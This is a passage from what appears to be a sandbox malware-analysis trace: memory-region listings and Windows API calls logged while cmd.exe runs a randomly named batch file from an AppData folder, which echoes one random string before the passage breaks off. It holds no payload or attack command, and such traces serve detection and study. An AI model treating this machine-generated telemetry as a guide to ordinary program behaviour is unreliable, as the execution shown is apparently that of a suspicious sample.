"pagefile_0x0000000000290000" filename = "" Region: id = 8780 start_va = 0x3a0000 end_va = 0x3a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 8781 start_va = 0x3b0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 8782 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 8783 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 8784 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8785 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 8788 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8789 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8790 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8791 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 8792 start_va = 0x12f0000 end_va = 0x15befff entry_point = 0x12f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 96 os_tid = 0xe80 [0117.464] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fefc | out: lpSystemTimeAsFileTime=0x28fefc*(dwLowDateTime=0x83537b20, dwHighDateTime=0x1d440a9)) [0117.464] GetCurrentProcessId () returned 0xe7c [0117.464] GetCurrentThreadId () returned 0xe80 [0117.464] GetTickCount () returned 0x27de5 [0117.464] QueryPerformanceCounter (in: lpPerformanceCount=0x28fef4 | out: lpPerformanceCount=0x28fef4*=17425351039) returned 1 [0117.465] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0117.465] __set_app_type (_Type=0x1) [0117.465] __p__fmode () returned 0x76b331f4 [0117.465] __p__commode () returned 0x76b331fc [0117.465] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0117.465] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0117.466] GetCurrentThreadId () returned 0xe80 [0117.466] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe80) returned 0x38 [0117.466] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0117.466] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0117.466] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.466] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.466] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fe8c | out: phkResult=0x28fe8c*=0x0) returned 0x2 [0117.466] VirtualQuery (in: lpAddress=0x28fec3, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.466] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0117.466] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0117.466] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.466] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fe5c, dwLength=0x1c | out: lpBuffer=0x28fe5c*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0117.466] GetConsoleOutputCP () returned 0x1b5 [0117.466] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.467] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0117.467] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.467] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0117.467] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.467] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0117.467] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.467] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0117.467] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.467] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0117.467] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.468] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0117.468] GetEnvironmentStringsW () returned 0x490150* [0117.468] FreeEnvironmentStringsW (penv=0x490150) returned 1 [0117.468] GetEnvironmentStringsW () returned 0x490150* [0117.468] FreeEnvironmentStringsW (penv=0x490150) returned 1 [0117.468] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28edfc | out: phkResult=0x28edfc*=0x40) returned 0x0 [0117.468] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x0, lpData=0x28ee08*=0x0, lpcbData=0x28ee00*=0x1000) returned 0x2 [0117.468] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x4, lpData=0x28ee08*=0x1, lpcbData=0x28ee00*=0x4) returned 0x0 [0117.468] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x0, lpData=0x28ee08*=0x1, lpcbData=0x28ee00*=0x1000) returned 0x2 [0117.468] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x4, lpData=0x28ee08*=0x0, lpcbData=0x28ee00*=0x4) returned 0x0 [0117.468] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x4, lpData=0x28ee08*=0x40, lpcbData=0x28ee00*=0x4) returned 0x0 [0117.468] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x4, lpData=0x28ee08*=0x40, lpcbData=0x28ee00*=0x4) returned 0x0 [0117.469] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x0, lpData=0x28ee08*=0x40, lpcbData=0x28ee00*=0x1000) returned 0x2 [0117.469] RegCloseKey (hKey=0x40) returned 0x0 [0117.469] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28edfc | out: phkResult=0x28edfc*=0x40) returned 0x0 [0117.469] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x0, lpData=0x28ee08*=0x40, lpcbData=0x28ee00*=0x1000) returned 0x2 [0117.469] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x4, lpData=0x28ee08*=0x1, lpcbData=0x28ee00*=0x4) returned 0x0 [0117.469] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x0, lpData=0x28ee08*=0x1, lpcbData=0x28ee00*=0x1000) returned 0x2 [0117.469] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x4, lpData=0x28ee08*=0x0, lpcbData=0x28ee00*=0x4) returned 0x0 [0117.469] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x4, lpData=0x28ee08*=0x9, lpcbData=0x28ee00*=0x4) returned 0x0 [0117.469] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x4, lpData=0x28ee08*=0x9, lpcbData=0x28ee00*=0x4) returned 0x0 [0117.469] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ee04, lpData=0x28ee08, lpcbData=0x28ee00*=0x1000 | out: lpType=0x28ee04*=0x0, lpData=0x28ee08*=0x9, lpcbData=0x28ee00*=0x1000) returned 0x2 [0117.469] RegCloseKey (hKey=0x40) returned 0x0 [0117.469] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635d [0117.469] srand (_Seed=0x5b88635d) [0117.469] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd\"" [0117.469] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd\"" [0117.469] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.470] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4919b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0117.470] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.470] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.470] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0117.470] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.470] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0117.470] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0117.470] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0117.470] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0117.470] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0117.470] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0117.470] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0117.470] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0117.470] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0117.470] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28fbc8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.470] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28fbc8, lpFilePart=0x28fbc4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28fbc4*="Desktop") returned 0x18 [0117.470] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0117.471] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f944 | out: lpFindFileData=0x28f944) returned 0x48ffe0 [0117.471] FindClose (in: hFindFile=0x48ffe0 | out: hFindFile=0x48ffe0) returned 1 [0117.471] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f944 | out: lpFindFileData=0x28f944) returned 0x48ffe0 [0117.471] FindClose (in: hFindFile=0x48ffe0 | out: hFindFile=0x48ffe0) returned 1 [0117.471] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f944 | out: lpFindFileData=0x28f944) returned 0x48ffe0 [0117.471] FindClose (in: hFindFile=0x48ffe0 | out: hFindFile=0x48ffe0) returned 1 [0117.471] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0117.471] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0117.471] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0117.471] GetEnvironmentStringsW () returned 0x490150* [0117.471] FreeEnvironmentStringsW (penv=0x490150) returned 1 [0117.471] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.473] GetConsoleOutputCP () returned 0x1b5 [0117.473] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.473] GetUserDefaultLCID () returned 0x409 [0117.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28fd08, cchData=128 | out: lpLCData="0") returned 2 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28fd08, cchData=128 | out: lpLCData="0") returned 2 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28fd08, cchData=128 | out: lpLCData="1") returned 2 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0117.474] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0117.474] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0117.475] GetConsoleTitleW (in: lpConsoleTitle=0x4901e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.475] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0117.475] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0117.475] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0117.475] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0117.479] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd", _String2=")") returned 58 [0117.479] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd") returned 3 [0117.479] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd") returned 3 [0117.479] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd") returned 6 [0117.479] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd") returned 6 [0117.479] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd") returned 15 [0117.479] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd") returned 15 [0117.480] GetConsoleTitleW (in: lpConsoleTitle=0x28fa00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.480] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.480] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.480] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f7bc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f7b4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f7b4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0117.480] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0117.481] SetErrorMode (uMode=0x0) returned 0x0 [0117.481] SetErrorMode (uMode=0x1) returned 0x0 [0117.481] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x49dc08, lpFilePart=0x28f520 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x28f520*="vMfCCeRYkvQy") returned 0x2d [0117.481] SetErrorMode (uMode=0x0) returned 0x1 [0117.481] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0117.481] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.486] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.486] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd", fInfoLevelId=0x1, lpFindFileData=0x28f2bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f2bc) returned 0x4908f0 [0117.486] FindClose (in: hFindFile=0x4908f0 | out: hFindFile=0x4908f0) returned 1 [0117.486] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0117.486] GetConsoleTitleW (in: lpConsoleTitle=0x28f794, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.518] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0117.520] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0117.521] IdentifyCodeAuthzLevelW () returned 0x1 [0117.527] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0117.527] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0117.527] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0117.527] CloseCodeAuthzLevel () returned 0x1 [0117.527] SetErrorMode (uMode=0x0) returned 0x0 [0117.527] SetErrorMode (uMode=0x1) returned 0x0 [0117.527] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd", nBufferLength=0x104, lpBuffer=0x4904e8, lpFilePart=0x28f680 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd", lpFilePart=0x28f680*="KGiXH98V.cmd") returned 0x3a [0117.527] SetErrorMode (uMode=0x0) returned 0x1 [0117.527] CmdBatNotification () returned 0x0 [0117.527] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0117.528] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0117.528] _get_osfhandle (_FileHandle=3) returned 0x58 [0117.528] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.528] _get_osfhandle (_FileHandle=3) returned 0x58 [0117.528] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.528] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x23c, lpOverlapped=0x0) returned 1 [0117.528] SetFilePointer (in: hFile=0x58, lDistanceToMove=26, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a [0117.528] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=26, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="echo CiOHhXJTCFVtKQz1Zuv\r\n") returned 26 [0117.529] _get_osfhandle (_FileHandle=3) returned 0x58 [0117.529] GetFileType (hFile=0x58) returned 0x1 [0117.529] _get_osfhandle (_FileHandle=3) returned 0x58 [0117.529] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a [0117.529] _wcsicmp (_String1="echo", _String2=")") returned 60 [0117.529] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0117.529] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0117.529] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0117.529] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0117.529] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0117.529] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0117.530] _tell (_FileHandle=3) returned 26 [0117.530] _close (_FileHandle=3) returned 0 [0117.530] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0117.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.531] GetFileType (hFile=0x7) returned 0x2 [0117.531] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.531] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 1 [0117.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.531] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0117.531] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0117.531] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.531] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0117.531] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0117.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.531] GetFileType (hFile=0x7) returned 0x2 [0117.532] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.532] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0117.532] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.532] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 [0117.532] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.532] GetFileType (hFile=0x7) returned 0x2 [0117.532] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.532] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6c4 | out: lpMode=0x28f6c4) returned 1 [0117.532] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.532] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x490958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x28f6f0, lpReserved=0x0 | out: lpBuffer=0x490958*, lpNumberOfCharsWritten=0x28f6f0*=0x4) returned 1 [0117.533] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", 